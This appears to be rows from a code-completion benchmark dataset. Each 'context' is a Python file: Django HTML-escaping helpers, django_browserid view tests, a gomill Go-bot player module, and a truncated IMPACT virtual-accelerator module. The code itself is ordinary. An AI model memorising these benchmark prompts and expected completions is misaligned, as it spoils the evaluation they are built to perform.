gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
"""HTML utilities suitable for global use."""
from __future__ import unicode_literals
import re
import string
try:
from urllib.parse import quote, urlsplit, urlunsplit
except ImportError: # Python 2
from urllib import quote
from urlparse import urlsplit, urlunsplit
from django.utils.safestring import SafeData, mark_safe
from django.utils.encoding import smart_str, force_unicode
from django.utils.functional import allow_lazy
from django.utils import six
from django.utils.text import normalize_newlines
# Configuration for urlize() function.
TRAILING_PUNCTUATION = ['.', ',', ':', ';', '.)']
# Pairs of (opening, closing) punctuation that may wrap a URL.  The last pair
# handles URLs that were pasted inside already-escaped angle brackets.
WRAPPING_PUNCTUATION = [('(', ')'), ('<', '>'), ('[', ']'), ('&lt;', '&gt;')]

# List of possible strings used for bullets in bulleted lists.
# NOTE: these are HTML-entity spellings on purpose -- clean_html() matches
# them against raw HTML text before any entity decoding happens.
DOTS = ['&middot;', '*', '\u2022', '&#149;', '&bull;', '&#8226;']

# '&' not already part of a named or numeric entity.
unencoded_ampersands_re = re.compile(r'&(?!(\w+|#\d+);)')
# '%' not followed by two hex digits, i.e. not a valid percent-escape.
unquoted_percents_re = re.compile(r'%(?![0-9A-Fa-f]{2})')
# Capturing split so whitespace separators are preserved when rejoining.
word_split_re = re.compile(r'(\s+)')
simple_url_re = re.compile(r'^https?://\w', re.IGNORECASE)
simple_url_2_re = re.compile(r'^www\.|^(?!http)\w[^@]+\.(com|edu|gov|int|mil|net|org)$', re.IGNORECASE)
simple_email_re = re.compile(r'^\S+@\S+\.\S+$')
link_target_attribute_re = re.compile(r'(<a [^>]*?)target=[^\s>]+')
html_gunk_re = re.compile(r'(?:<br clear="all">|<i><\/i>|<b><\/b>|<em><\/em>|<strong><\/strong>|<\/?smallcaps>|<\/?uppercase>)', re.IGNORECASE)
hard_coded_bullets_re = re.compile(r'((?:<p>(?:%s).*?[a-zA-Z].*?</p>\s*)+)' % '|'.join([re.escape(x) for x in DOTS]), re.DOTALL)
# Empty trailing paragraphs: only &nbsp; entities, whitespace or <br /> inside.
trailing_empty_content_re = re.compile(r'(?:<p>(?:&nbsp;|\s|<br \/>)*?</p>\s*)+\Z')
def escape(text):
    """
    Returns the given text with ampersands, quotes and angle brackets encoded
    for use in HTML.
    """
    # '&' must be replaced first, otherwise the entities produced by the
    # later replacements would themselves be double-escaped.
    return mark_safe(force_unicode(text).replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;').replace("'", '&#39;'))
escape = allow_lazy(escape, six.text_type)
# Characters that must be replaced before embedding a value in a JavaScript
# string literal.  Backslash comes first so later replacements are not
# double-escaped; \u2028/\u2029 are line terminators in JS source code.
_base_js_escapes = (
    ('\\', '\\u005C'),
    ('\'', '\\u0027'),
    ('"', '\\u0022'),
    ('>', '\\u003E'),
    ('<', '\\u003C'),
    ('&', '\\u0026'),
    ('=', '\\u003D'),
    ('-', '\\u002D'),
    (';', '\\u003B'),
    ('\u2028', '\\u2028'),
    ('\u2029', '\\u2029')
)

# Escape every ASCII character with a value less than 32.
_js_escapes = (_base_js_escapes +
               tuple([('%c' % z, '\\u%04X' % z) for z in range(32)]))
def escapejs(value):
    """Hex encodes characters for use in JavaScript strings."""
    # Convert once up front and mark safe once at the end, instead of
    # re-wrapping the string on every iteration of the loop.
    value = force_unicode(value)
    for bad, good in _js_escapes:
        value = value.replace(bad, good)
    return mark_safe(value)
escapejs = allow_lazy(escapejs, six.text_type)
def conditional_escape(text):
    """
    Similar to escape(), except that it doesn't operate on pre-escaped
    strings.
    """
    # Strings already marked safe pass through untouched.
    return text if isinstance(text, SafeData) else escape(text)
def format_html(format_string, *args, **kwargs):
    """
    Similar to str.format, but passes all arguments through conditional_escape,
    and calls 'mark_safe' on the result. This function should be used instead
    of str.format or % interpolation to build up small HTML fragments.
    """
    args_safe = map(conditional_escape, args)
    # six.iteritems() works on both Python 2 and 3; dict.iteritems() does
    # not exist on Python 3 and would raise AttributeError there.
    kwargs_safe = dict((k, conditional_escape(v)) for (k, v) in
                       six.iteritems(kwargs))
    return mark_safe(format_string.format(*args_safe, **kwargs_safe))
def format_html_join(sep, format_string, args_generator):
    """
    A wrapper of format_html, for the common case of a group of arguments that
    need to be formatted using the same format string, and then joined using
    'sep'. 'sep' is also passed through conditional_escape.

    'args_generator' should be an iterator that returns the sequence of 'args'
    that will be passed to format_html.

    Example:

      format_html_join('\n', "<li>{0} {1}</li>", ((u.first_name, u.last_name)
                                                  for u in users))
    """
    # Each args item is converted to a tuple so it can be star-unpacked into
    # format_html; escaping happens inside format_html itself.
    return mark_safe(conditional_escape(sep).join(
        format_html(format_string, *tuple(args))
        for args in args_generator))
def linebreaks(value, autoescape=False):
    """Converts newlines into <p> and <br />s."""
    value = normalize_newlines(value)
    # Two or more consecutive newlines delimit paragraphs; a single newline
    # inside a paragraph becomes a <br /> tag.
    pieces = re.split('\n{2,}', value)
    if autoescape:
        pieces = [escape(p) for p in pieces]
    return '\n\n'.join('<p>%s</p>' % p.replace('\n', '<br />')
                       for p in pieces)
linebreaks = allow_lazy(linebreaks, six.text_type)
def strip_tags(value):
    """Returns the given HTML with all tags stripped."""
    return re.sub(r'<[^>]*?>', '', force_unicode(value))
# Pass six.text_type for consistency with every other allow_lazy() call in
# this module, so the lazy wrapper knows the expected result type.
strip_tags = allow_lazy(strip_tags, six.text_type)
def strip_spaces_between_tags(value):
    """Returns the given HTML with spaces between tags removed."""
    # Whitespace sitting directly between a closing '>' and the next '<'
    # is collapsed away entirely.
    html = force_unicode(value)
    return re.sub(r'>\s+<', '><', html)
strip_spaces_between_tags = allow_lazy(strip_spaces_between_tags, six.text_type)
def strip_entities(value):
    """Returns the given HTML with all entities (&something;) stripped."""
    # Matches both named (&amp;) and numeric (&#38;) entities.
    text = force_unicode(value)
    return re.sub(r'&(?:\w+|#\d+);', '', text)
strip_entities = allow_lazy(strip_entities, six.text_type)
def fix_ampersands(value):
    """Returns the given HTML with all unencoded ampersands encoded correctly."""
    # unencoded_ampersands_re only matches '&' that is not already part of an
    # entity, so already-encoded text is left untouched.
    return unencoded_ampersands_re.sub('&amp;', force_unicode(value))
fix_ampersands = allow_lazy(fix_ampersands, six.text_type)
def smart_urlquote(url):
    "Quotes a URL if it isn't already quoted."
    # Handle IDN before quoting.
    scheme, netloc, path, query, fragment = urlsplit(url)
    try:
        netloc = netloc.encode('idna')  # IDN -> ACE
    except UnicodeError:  # invalid domain part
        pass
    else:
        # Only rebuild the URL when the IDNA encoding succeeded.
        url = urlunsplit((scheme, netloc, path, query, fragment))

    # An URL is considered unquoted if it contains no % characters or
    # contains a % not followed by two hexadecimal digits. See #9655.
    if '%' not in url or unquoted_percents_re.search(url):
        # See http://bugs.python.org/issue2637
        url = quote(smart_str(url), safe=b'!*\'();:@&=+$,/?#[]~')

    return force_unicode(url)
def urlize(text, trim_url_limit=None, nofollow=False, autoescape=False):
    """
    Converts any URLs in text into clickable links.

    Works on http://, https://, www. links, and also on links ending in one of
    the original seven gTLDs (.com, .edu, .gov, .int, .mil, .net, and .org).
    Links can have trailing punctuation (periods, commas, close-parens) and
    leading punctuation (opening parens) and it'll still do the right thing.

    If trim_url_limit is not None, the URLs in link text longer than this limit
    will truncated to trim_url_limit-3 characters and appended with an elipsis.

    If nofollow is True, the URLs in link text will get a rel="nofollow"
    attribute.

    If autoescape is True, the link text and URLs will get autoescaped.
    """
    # Truncate x to `limit` characters (ellipsis included) when a limit is set.
    trim_url = lambda x, limit=trim_url_limit: limit is not None and (len(x) > limit and ('%s...' % x[:max(0, limit - 3)])) or x
    safe_input = isinstance(text, SafeData)
    # word_split_re captures the whitespace separators, so ''.join(words)
    # at the end reproduces the original spacing exactly.
    words = word_split_re.split(force_unicode(text))
    for i, word in enumerate(words):
        match = None  # (unused; kept as in the original)
        if '.' in word or '@' in word or ':' in word:
            # Deal with punctuation.
            lead, middle, trail = '', word, ''
            for punctuation in TRAILING_PUNCTUATION:
                if middle.endswith(punctuation):
                    middle = middle[:-len(punctuation)]
                    trail = punctuation + trail
            for opening, closing in WRAPPING_PUNCTUATION:
                if middle.startswith(opening):
                    middle = middle[len(opening):]
                    lead = lead + opening
                # Keep parentheses at the end only if they're balanced.
                if (middle.endswith(closing)
                    and middle.count(closing) == middle.count(opening) + 1):
                    middle = middle[:-len(closing)]
                    trail = closing + trail

            # Make URL we want to point to.
            url = None
            nofollow_attr = ' rel="nofollow"' if nofollow else ''
            if simple_url_re.match(middle):
                url = smart_urlquote(middle)
            elif simple_url_2_re.match(middle):
                url = smart_urlquote('http://%s' % middle)
            elif not ':' in middle and simple_email_re.match(middle):
                local, domain = middle.rsplit('@', 1)
                try:
                    domain = domain.encode('idna')
                except UnicodeError:
                    # Invalid IDN domain: leave this word untouched.
                    continue
                url = 'mailto:%s@%s' % (local, domain)
                nofollow_attr = ''

            # Make link.
            if url:
                trimmed = trim_url(middle)
                if autoescape and not safe_input:
                    lead, trail = escape(lead), escape(trail)
                    url, trimmed = escape(url), escape(trimmed)
                middle = '<a href="%s"%s>%s</a>' % (url, nofollow_attr, trimmed)
                words[i] = mark_safe('%s%s%s' % (lead, middle, trail))
            else:
                # Looked like a URL/email but matched nothing: escape/mark
                # the original word as appropriate.
                if safe_input:
                    words[i] = mark_safe(word)
                elif autoescape:
                    words[i] = escape(word)
        elif safe_input:
            words[i] = mark_safe(word)
        elif autoescape:
            words[i] = escape(word)
    return ''.join(words)
urlize = allow_lazy(urlize, six.text_type)
def clean_html(text):
    """
    Clean the given HTML.  Specifically, do the following:
        * Convert <b> and <i> to <strong> and <em>.
        * Encode all ampersands correctly.
        * Remove all "target" attributes from <a> tags.
        * Remove extraneous HTML, such as presentational tags that open and
          immediately close and <br clear="all">.
        * Convert hard-coded bullets into HTML unordered lists.
        * Remove stuff like "<p>&nbsp;&nbsp;</p>", but only if it's at the
          bottom of the text.
    """
    # normalize_newlines is already imported at module level; the redundant
    # local re-import has been removed.
    text = normalize_newlines(force_unicode(text))
    text = re.sub(r'<(/?)\s*b\s*>', '<\\1strong>', text)
    text = re.sub(r'<(/?)\s*i\s*>', '<\\1em>', text)
    text = fix_ampersands(text)
    # Remove all target="" attributes from <a> tags.
    text = link_target_attribute_re.sub('\\1', text)
    # Trim stupid HTML such as <br clear="all">.
    text = html_gunk_re.sub('', text)

    # Convert hard-coded bullets into HTML unordered lists.
    def replace_p_tags(match):
        s = match.group().replace('</p>', '</li>')
        for d in DOTS:
            s = s.replace('<p>%s' % d, '<li>')
        return '<ul>\n%s\n</ul>' % s
    text = hard_coded_bullets_re.sub(replace_p_tags, text)

    # Remove stuff like "<p>&nbsp;&nbsp;</p>", but only if it's at the bottom
    # of the text.
    text = trailing_empty_content_re.sub('', text)
    return text
clean_html = allow_lazy(clean_html, six.text_type)
| |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django.contrib import auth
from django.test.client import RequestFactory
from django.utils import six
from django.utils.functional import lazy
from mock import Mock, patch, PropertyMock
from nose.tools import eq_, ok_
from django_browserid import BrowserIDException, views
from django_browserid.tests import mock_browserid, TestCase
class JSONViewTests(TestCase):
    """Tests for the 405 handling of the JSONView base class."""

    def test_http_method_not_allowed(self):
        # A view that only defines ``get`` must report 405 and advertise
        # GET in its Allow header.
        class TestView(views.JSONView):
            def get(self, request, *args, **kwargs):
                return 'asdf'

        response = TestView().http_method_not_allowed()

        eq_(response.status_code, 405)
        ok_(set(['GET']).issubset(set(response['Allow'].split(', '))))
        self.assert_json_equals(response.content, {'error': 'Method not allowed.'})

    def test_http_method_not_allowed_allowed_methods(self):
        # The Allow header should list every HTTP verb the view implements.
        class GetPostView(views.JSONView):
            def get(self, request, *args, **kwargs):
                return 'asdf'

            def post(self, request, *args, **kwargs):
                return 'qwer'

        response = GetPostView().http_method_not_allowed()
        ok_(set(['GET', 'POST']).issubset(set(response['Allow'].split(', '))))

        class GetPostPutDeleteHeadView(views.JSONView):
            def get(self, request, *args, **kwargs):
                return 'asdf'

            def post(self, request, *args, **kwargs):
                return 'qwer'

            def put(self, request, *args, **kwargs):
                return 'qwer'

            def delete(self, request, *args, **kwargs):
                return 'qwer'

            def head(self, request, *args, **kwargs):
                return 'qwer'

        response = GetPostPutDeleteHeadView().http_method_not_allowed()
        expected_methods = set(['GET', 'POST', 'PUT', 'DELETE', 'HEAD'])
        actual_methods = set(response['Allow'].split(', '))
        ok_(expected_methods.issubset(actual_methods))
class GetNextTests(TestCase):
    """Tests for the ``views._get_next`` redirect-URL helper."""

    def setUp(self):
        self.factory = RequestFactory()

    def test_no_param(self):
        """If next isn't in the POST params, return None."""
        post_request = self.factory.post('/')
        eq_(views._get_next(post_request), None)

    def test_is_safe(self):
        """Return the value of next if it is considered safe."""
        post_request = self.factory.post('/', {'next': '/asdf'})
        post_request.get_host = lambda: 'myhost'

        with patch.object(views, 'is_safe_url', return_value=True) as is_safe_url:
            eq_(views._get_next(post_request), '/asdf')
            is_safe_url.assert_called_with('/asdf', host='myhost')

    def test_isnt_safe(self):
        """If next isn't safe, return None."""
        post_request = self.factory.post('/', {'next': '/asdf'})
        post_request.get_host = lambda: 'myhost'

        with patch.object(views, 'is_safe_url', return_value=False) as is_safe_url:
            eq_(views._get_next(post_request), None)
            is_safe_url.assert_called_with('/asdf', host='myhost')
class VerifyTests(TestCase):
    """Tests for the BrowserID assertion-verification view."""

    def setUp(self):
        self.factory = RequestFactory()

    def verify(self, request_type, **kwargs):
        """
        Call the verify view function. Kwargs are passed as GET or POST
        arguments.
        """
        if request_type == 'get':
            request = self.factory.get('/browserid/verify', kwargs)
        else:
            request = self.factory.post('/browserid/verify', kwargs)

        verify_view = views.Verify.as_view()
        # Patch auth.login so invoking the view never touches session state.
        with patch.object(auth, 'login'):
            response = verify_view(request)
        return response

    def test_no_assertion(self):
        """If no assertion is given, return a failure result."""
        with self.settings(LOGIN_REDIRECT_URL_FAILURE='/fail'):
            response = self.verify('post', blah='asdf')
        eq_(response.status_code, 403)
        self.assert_json_equals(response.content, {'redirect': '/fail'})

    @mock_browserid(None)
    def test_auth_fail(self):
        """If authentication fails, redirect to the failure URL."""
        with self.settings(LOGIN_REDIRECT_URL_FAILURE='/fail'):
            response = self.verify('post', assertion='asdf')
        eq_(response.status_code, 403)
        self.assert_json_equals(response.content, {'redirect': '/fail'})

    @mock_browserid('test@example.com')
    def test_auth_success_redirect_success(self):
        """If authentication succeeds, redirect to the success URL."""
        # The user's email matches the mocked BrowserID response above, so
        # authentication resolves to this user.
        user = auth.models.User.objects.create_user('asdf', 'test@example.com')
        request = self.factory.post('/browserid/verify', {'assertion': 'asdf'})

        with self.settings(LOGIN_REDIRECT_URL='/success'):
            with patch('django_browserid.views.auth.login') as login:
                verify = views.Verify.as_view()
                response = verify(request)
        login.assert_called_with(request, user)
        eq_(response.status_code, 200)
        self.assert_json_equals(response.content,
                                {'email': 'test@example.com', 'redirect': '/success'})

    def test_sanity_checks(self):
        """Run sanity checks on all incoming requests."""
        with patch('django_browserid.views.sanity_checks') as sanity_checks:
            self.verify('post')
        ok_(sanity_checks.called)

    @patch('django_browserid.views.auth.login')
    def test_login_success_no_next(self, *args):
        """
        If _get_next returns None, use success_url for the redirect
        parameter.
        """
        view = views.Verify()
        view.request = self.factory.post('/')
        view.user = Mock(email='a@b.com')

        with patch('django_browserid.views._get_next', return_value=None) as _get_next:
            with patch.object(views.Verify, 'success_url', '/?asdf'):
                response = view.login_success()

        self.assert_json_equals(response.content, {'email': 'a@b.com', 'redirect': '/?asdf'})
        _get_next.assert_called_with(view.request)

    @patch('django_browserid.views.auth.login')
    def test_login_success_next(self, *args):
        """
        If _get_next returns a URL, use it for the redirect parameter.
        """
        view = views.Verify()
        view.request = self.factory.post('/')
        view.user = Mock(email='a@b.com')

        with patch('django_browserid.views._get_next', return_value='/?qwer') as _get_next:
            with patch.object(views.Verify, 'success_url', '/?asdf'):
                response = view.login_success()

        self.assert_json_equals(response.content, {'email': 'a@b.com', 'redirect': '/?qwer'})
        _get_next.assert_called_with(view.request)
class LogoutTests(TestCase):
    """Tests for the Logout view's redirect behaviour."""

    def setUp(self):
        self.factory = RequestFactory()
        # Patch _get_next for the duration of each test; the patch is
        # stopped automatically via addCleanup.
        _get_next_patch = patch('django_browserid.views._get_next')
        self._get_next = _get_next_patch.start()
        self.addCleanup(_get_next_patch.stop)

    def test_redirect(self):
        """Include LOGOUT_REDIRECT_URL in the response."""
        request = self.factory.post('/')
        logout = views.Logout.as_view()
        self._get_next.return_value = None

        with patch.object(views.Logout, 'redirect_url', '/test/foo'):
            with patch('django_browserid.views.auth.logout') as auth_logout:
                response = logout(request)
        auth_logout.assert_called_with(request)
        eq_(response.status_code, 200)
        self.assert_json_equals(response.content, {'redirect': '/test/foo'})

    def test_redirect_next(self):
        """
        If _get_next returns a URL, use it for the redirect parameter.
        """
        request = self.factory.post('/')
        logout = views.Logout.as_view()
        self._get_next.return_value = '/test/bar'

        with patch.object(views.Logout, 'redirect_url', '/test/foo'):
            with patch('django_browserid.views.auth.logout'):
                response = logout(request)
        self.assert_json_equals(response.content, {'redirect': '/test/bar'})
class CsrfTokenTests(TestCase):
    """Tests for the CsrfToken view."""

    def setUp(self):
        self.factory = RequestFactory()
        self.view = views.CsrfToken()

    def test_lazy_token_called(self):
        """
        If the csrf_token variable in the RequestContext is a lazy
        callable, make sure it is called during the view.
        """
        global _lazy_csrf_token_called
        _lazy_csrf_token_called = False

        # I'd love to use a Mock here instead, but lazy doesn't behave
        # well with Mocks for some reason.
        def _lazy_csrf_token():
            global _lazy_csrf_token_called
            _lazy_csrf_token_called = True
            return 'asdf'

        csrf_token = lazy(_lazy_csrf_token, six.text_type)()
        request = self.factory.get('/browserid/csrf/')
        with patch('django_browserid.views.RequestContext') as RequestContext:
            RequestContext.return_value = {'csrf_token': csrf_token}
            response = self.view.get(request)

        eq_(response.status_code, 200)
        # The response body is the rendered token, and the lazy callable must
        # have actually been evaluated while building it.
        eq_(response.content, b'asdf')
        ok_(_lazy_csrf_token_called)

    def test_never_cache(self):
        # The CSRF endpoint must never be cached by clients.
        request = self.factory.get('/browserid/csrf/')
        response = self.view.get(request)
        eq_(response['Cache-Control'], 'max-age=0')
| |
from __future__ import print_function
import logging
import numpy as np
import tempfile
import copy
import gomill
from gomill import common, boards, sgf, sgf_moves, gtp_states
import utils
import analyze_board
"""
Basic Player / Bot objects;
Player should be gomill compatible envelope which actually generates
moves, resigns, ..
Bot should be the object that actually does the core work, e.g. computing
Move probability, ..
"""
class Player(object):
    """Base GTP player: maps GTP command names to handler methods."""

    def __init__(self):
        # GTP command name -> bound handler method.
        self.handlers = {'name': self.handle_name,
                         'quit': self.handle_quit}
        self.name = None

    def genmove(self, game_state, player):
        """
        game_state is gomill.gtp_states.Game_state
        :returns: gomill.Move_generator_result
        """
        raise NotImplementedError

    def handle_name(self, args):
        # Fall back to the class name when no explicit name was set.
        return self.name if self.name is not None else self.__class__.__name__

    def handle_quit(self, args):
        pass

    def get_handlers(self):
        return self.handlers

    def __str__(self):
        return "<%s>" % self.handle_name([])
class DistWrappingMaxPlayer(Player):
    """
    A simple wrapping bot which chooses next move to be the one with the
    biggest (therefore the name) probability. The probabilities are computed
    by the wrapped bot's gen_probdist().
    """
    def __init__(self, bot):
        super(DistWrappingMaxPlayer, self).__init__()
        self.bot = bot
        # Extra GTP commands exposed on top of the base Player set.
        self.handlers['ex-dist'] = self.handle_ex_dist
        self.handlers['move_probabilities'] = self.handle_move_probabilities
        self.move_num = 0

    def genmove(self, game_state, player):
        """Play the highest-probability point, or pass when dist is None."""
        self.move_num += 1
        dist = self.bot.gen_probdist(game_state, player)
        result = gtp_states.Move_generator_result()
        if dist is not None:
            # argmax over the flattened board, mapped back to (row, col).
            move = np.unravel_index(np.argmax(dist), dist.shape)
            result.move = move
            logging.debug("%s valid moves\n%s"%(self,
                                                utils.dist_stats(dist)))
            logging.debug("%s move %d: playing %s"%(self,
                                                    self.move_num,
                                                    gomill.common.format_vertex(move)))
        else:
            result.pass_move = True
            logging.debug("%s move %d: playing pass"%(self, self.move_num))
        return result

    def handle_quit(self, args):
        # Give the wrapped bot a chance to free its resources.
        self.bot.close()

    def handle_move_probabilities(self, args):
        return self.bot.move_probabilities()

    def handle_ex_dist(self, args):
        """Return stats for the top N moves of the last distribution."""
        top = 3
        if args:
            try:
                top = gomill.gtp_engine.interpret_int(args[0])
            except IndexError:
                # Fixed: this previously called the bare name
                # ``gtp_engine.report_bad_arguments()``, which is undefined
                # here (NameError) -- only ``gomill`` is imported.
                # NOTE(review): interpret_int likely raises gomill's own
                # error type rather than IndexError; confirm this except
                # clause can actually trigger.
                gomill.gtp_engine.report_bad_arguments()
        return self.bot.dist_stats(top)
class DistWrappingSamplingPlayer(Player):
    """
    A simple wrapping bot which randomly samples next move based on the moves'
    probability distribution, computed by the wrapped bot's gen_probdist().
    Never passes.
    """
    def __init__(self, bot):
        super(DistWrappingSamplingPlayer, self).__init__()
        self.bot = bot

    def genmove(self, game_state, player):
        dist = self.bot.gen_probdist(game_state, player)
        result = gtp_states.Move_generator_result()
        if dist is not None:
            # choose an intersection with probability given by the dist
            side = game_state.board.side
            coord = np.random.choice(side ** 2, 1, p=dist.ravel())[0]
            # Use floor division so the row index stays an integer on
            # Python 3 as well (plain '/' yields a float there).
            move = (coord // side, coord % side)
            result.move = move
        else:
            result.pass_move = True
        return result

    def handle_quit(self, args):
        self.bot.close()
class RandomPlayer(Player):
    """Plays a random unoccupied point; passes after an opponent pass."""

    def genmove(self, game_state, player):
        result = gtp_states.Move_generator_result()
        # pass if the previous move in the history was a pass
        if game_state.move_history and not game_state.move_history[-1].move:
            result.pass_move = True
            return result
        # Try a handful of random points; resign if all attempts were
        # occupied.  range() instead of Python-2-only xrange(): for ten
        # elements the difference is negligible and it is Python 3 ready.
        for _ in range(10):
            row, col = np.random.choice(game_state.board.side, 2)
            ## TODO this might be incorrect move
            # but nobody will use the RandomPlayer anyway
            if not game_state.board.get(row, col):
                result.move = (row, col)
                return result
        result.resign = True
        return result
class WrappingGnuGoPlayer(Player):
    """
    Wraps another Player and consults GnuGo first: when GnuGo would pass or
    resign (and that behaviour is enabled), do so; otherwise delegate move
    generation to the wrapped player.
    """
    def __init__(self, player, passing=True, resigning=False):
        # player: the Player to delegate to when GnuGo does not pass/resign.
        # passing/resigning: whether to honour GnuGo's pass/resign verdicts.
        super(WrappingGnuGoPlayer, self).__init__()
        self.player = player
        self.passing = passing
        self.resigning = resigning
        # Merge handler maps; this wrapper's own handlers take precedence
        # over the wrapped player's.
        hp = copy.copy(player.get_handlers())
        hp.update(self.handlers)
        self.handlers = hp

    def genmove(self, game_state, color):
        result = gtp_states.Move_generator_result()
        logging.debug("%s enter"%(self))
        move = self.gnu_go_move(game_state, color)
        # pass if GnuGo tells us to do so
        if self.passing and move == 'pass':
            result.pass_move = True
            return result
        elif self.resigning and move == 'resign':
            result.resign = True
            return result
        else:
            logging.debug("%s not listening, descend"%(self))
            return self.player.genmove(game_state, color)

    def gnu_go_move(self, game_state, color):
        """Serialise the position to a temp SGF file and ask GnuGo to move."""
        assert isinstance(game_state.board, gomill.boards.Board) # for wingide code completion
        game = gomill.sgf.Sgf_game(size=game_state.board.side)
        gomill.sgf_moves.set_initial_position(game, game_state.board)
        node = game.get_root()
        node.set('KM', game_state.komi)
        # PL records which colour is to play next.
        node.set('PL', color)
        with tempfile.NamedTemporaryFile() as sgf_file:
            sgf_file.write(game.serialise())
            sgf_file.flush()
            gg_move = utils.get_gnu_go_response(sgf_file.name, color)
        # GnuGo answers e.g. 'PASS'/'resign'/vertex; normalise the case.
        return gg_move.lower()
class DistributionBot(object):
    """
    Base class for bots that produce a move-probability distribution.

    Subclasses implement gen_probdist_raw(); gen_probdist() post-processes
    the raw distribution so that illegal moves get zero probability.
    """
    def __init__(self):
        # Last distribution returned by gen_probdist(); None means pass.
        self.last_dist = None
        # The player ('b'/'w') the last distribution was generated for.
        self.last_player = None

    def __str__(self):
        return "<%s>"%(self.__class__.__name__)

    def gen_probdist_raw(self, game_state, player):
        """
        The core method to implement for distribution bots.

        :return: a numpy array of floats of shape (board.side, board.side),
            or None for pass; the array should be normalized to 1
        """
        raise NotImplementedError

    def gen_probdist(self, game_state, player):
        """
        Generates a correct move probability distribution for the next move,
        using the gen_probdist_raw().

        Correct means that it zeroes out probability of playing incorrect move,
        such as move forbidden by ko, suicide and occupied points.

        Stores the dist and the player.
        :return: a numpy array of floats of shape (board.side, board.side),
            or None for pass; the array is normalized to 1
        """
        dist = self.gen_probdist_raw(game_state, player)
        if dist is not None:
            correct_moves = analyze_board.board2correct_move_mask(game_state.board, player)
            if game_state.ko_point:
                correct_moves[game_state.ko_point[0]][game_state.ko_point[1]] = 0
            # compute some debugging stats of the incorrect moves first
            incorrect_dist = (1 - correct_moves) * dist
            logging.debug("%s incorrect moves\n%s"%(self,
                                                    utils.dist_stats(incorrect_dist)))
            # keep only correct moves
            dist = correct_moves * dist
            s = dist.sum()
            if s > 0.0:
                # Reuse the sum computed above instead of summing again.
                dist = dist / s
            else:
                logging.debug("No valid moves, PASSING.")
                dist = None
        self.last_dist = dist
        self.last_player = player
        return self.last_dist

    def move_probabilities(self):
        """Return 'VERTEX probability' lines for all nonzero points."""
        if self.last_dist is not None:
            ret = []
            for row, col in np.transpose(np.nonzero(self.last_dist)):
                ret.append("%s %f"%(gomill.common.format_vertex((row, col)),
                                    self.last_dist[row][col]))
            return '\n'.join(ret)
        return ''

    def dist_stats(self, top=3):
        """Return a textual summary of the top moves of the last dist."""
        if self.last_dist is not None:
            return utils.dist_stats(self.last_dist, top)
        return ''

    def close(self):
        """Called upon exit, to allow for resource freeup."""
        pass
class RandomDistBot(DistributionBot):
    """Baseline bot: a uniformly random (unnormalized) distribution."""

    def gen_probdist_raw(self, game_state, player):
        side = game_state.board.side
        return np.random.random((side, side))
if __name__ == "__main__":
def test_bot():
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=logging.DEBUG)
player = DistWrappingMaxPlayer(RandomDistBot())
class State:
pass
s = State()
b = gomill.boards.Board(3)
s.board = b
b.play(1, 1, "b")
b.play(0, 1, "b")
logging.debug("\n"+gomill.ascii_boards.render_board(b))
mv = player.genmove(s, 'w').move
b.play(mv[0], mv[1], 'w')
logging.debug("\n"+gomill.ascii_boards.render_board(b))
logging.debug("best move is " + gomill.common.format_vertex(mv))
logging.debug("\n" + str(player.bot.last_dist))
logging.debug(utils.dist_stats(player.bot.last_dist))
test_bot()
| |
# encoding: UTF-8
"""Library for running an EPICS-based virtual accelertor using IMPACT particle tracker."""
from __future__ import print_function
import cothread
import logging
import math
import numpy
import os.path
import random
import re
import shutil
import subprocess
import tempfile
import threading
import time
from collections import OrderedDict
from copy import deepcopy
from cothread import catools
from phantasy.library.lattice.impact import LatticeFactory, OUTPUT_MODE_DIAG
from phantasy.library.layout import BCMElement
from phantasy.library.layout import BLElement
from phantasy.library.layout import BLMElement
from phantasy.library.layout import BPMElement
from phantasy.library.layout import BendElement
from phantasy.library.layout import CavityElement
from phantasy.library.layout import CorElement
from phantasy.library.layout import DriftElement
from phantasy.library.layout import PMElement
from phantasy.library.layout import PortElement
from phantasy.library.layout import QuadElement
from phantasy.library.layout import SeqElement
from phantasy.library.layout import SextElement
from phantasy.library.layout import SolCorElement
from phantasy.library.layout import StripElement
from phantasy.library.layout import ValveElement
from phantasy.library.parser import Configuration
try:
basestring # Python 2.X
except NameError:
basestring = str # Python 3.X
__copyright__ = "Copyright (c) 2015, Facility for Rare Isotope Beams"
__author__ = "Dylan Maxwell"

# configuration options (keys looked up in the Configuration object)
CONFIG_MACHINE = "machine"
CONFIG_IMPACT_EXE_FILE = "impact_exe_file"
CONFIG_IMPACT_DATA_DIR = "impact_data_dir"

# default values
_DEFAULT_IMPACT_EXE = "impact"  # used when no exe path is configured
_TEMP_DIRECTORY_SUFFIX = "_va_impact"
_DEFAULT_ERROR_VALUE = 0.0
_VA_STATUS_GOOD = "OK"
_VA_STATUS_BAD = "ERR"

# global logger instance
_LOGGER = logging.getLogger(__name__)

# global virtual accelerator (singleton managed by start()/stop())
_VIRTUAL_ACCELERATOR = None
def start(layout, **kwargs):
    """Start the global virtual accelerator.

    Parameters
    ----------
    layout :
        Accelerator layout object.

    Keyword Arguments
    -----------------
    settings :
        Dictionary of machine settings.
    channels :
        List of channel tuples with (name, properties, tags).
    start :
        Name of accelerator element to start simulation.
    end :
        Name of accelerator element to end simulation.
    data_dir :
        Path of directory containing IMPACT data files.
    work_dir :
        Path of directory for execution of IMPACT.
    """
    global _VIRTUAL_ACCELERATOR

    # Lazily build the module-level singleton on first use.
    if _VIRTUAL_ACCELERATOR is None:
        _VIRTUAL_ACCELERATOR = build_virtaccel(layout, **kwargs)

    if _VIRTUAL_ACCELERATOR.is_started():
        raise RuntimeError("Virtual Accelerator already started")

    _VIRTUAL_ACCELERATOR.start()
def stop():
    """Stop the global virtual accelerator.
    """
    global _VIRTUAL_ACCELERATOR

    va = _VIRTUAL_ACCELERATOR
    # Nothing to stop if it was never built or never started.
    if va is None or not va.is_started():
        raise RuntimeError("Virtual Accelerator not started")

    va.stop()
def build_virtaccel(layout, **kwargs):
    """Convenience method to build a virtual accelerator.

    Parameters
    ----------
    layout :
        Accelerator layout object

    Keyword Arguments
    -----------------
    settings :
        Dictionary of machine settings
    channels :
        List of channel tuples with (name, properties, tags)
    start :
        Name of accelerator element to start simulation
    end :
        Name of accelerator element to end simulation
    data_dir :
        Path of directory containing IMPACT data files
    work_dir :
        Path of directory for execution of IMPACT

    Returns
    -------
    ret :
